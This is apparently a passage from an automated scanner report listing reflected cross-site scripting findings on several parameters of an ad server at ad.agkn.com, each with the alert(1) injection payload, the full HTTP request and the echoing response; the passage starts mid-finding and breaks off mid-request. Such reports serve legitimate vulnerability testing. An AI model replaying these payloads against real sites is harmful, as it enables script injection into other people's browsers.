The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5340"><script>alert(1)</script>140300babcc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcc HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAA8BArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flJrtfJ6qWCjAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:54 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcchttp://ad.agkn.com/interaction!che=392546480?imid=5939040586662764707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...
|
2.7. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1131! |
Issue detail
The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81d44"><script>alert(1)</script>6ee1469f996 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJQAAAAAAwBArwBATUBC%2FEB0AADAUIBBoABQwEGgAFBAQaAAQK8fnjlj%2BuxPLfUAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1603187548?imid=8711527296671725524&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Con
...[SNIP]...
|
2.8. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1131! |
Issue detail
The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db7ef"><script>alert(1)</script>a402f89f56b was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:05 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJRAAAAABABArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjT3r%2FI4Pw%2BjAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:05 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect=http://ad.agkn.com/interaction!che=1794660149?imid=3816712664080388003&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Produc
...[SNIP]...
|
2.9. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1131! |
Issue detail
The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dd2"><script>alert(1)</script>488066488aa was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJQAAAAAA4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjzlQUQ4QovRAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1106824953?imid=4387985173199883217&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...
|
2.10. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1131! |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 372d8"%3balert(1)//04ade7f7217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372d8";alert(1)//04ade7f7217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8"%3balert(1)//04ade7f7217=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:08 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJUAAAAABYBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fkadB%2FcIop4dAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:08 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8";alert(1)//04ade7f7217=1http://ad.agkn.com/interaction!che=1298692797?imid=5088231911581720093&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...
|
2.11. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1131! |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f604e"><script>alert(1)</script>3e78bbef9e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:07 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJTAAAAABQBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjtIPx4EjM5IAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:07 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1http://ad.agkn.com/interaction!che=441258755?imid=4271733644718820936&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...
|
2.12. http://ad.agkn.com/iframe!t=1131! [redirect parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.agkn.com |
| Path: |
/iframe!t=1131! |
Issue detail
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5798"><script>alert(1)</script>bbf67718b2e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2e HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
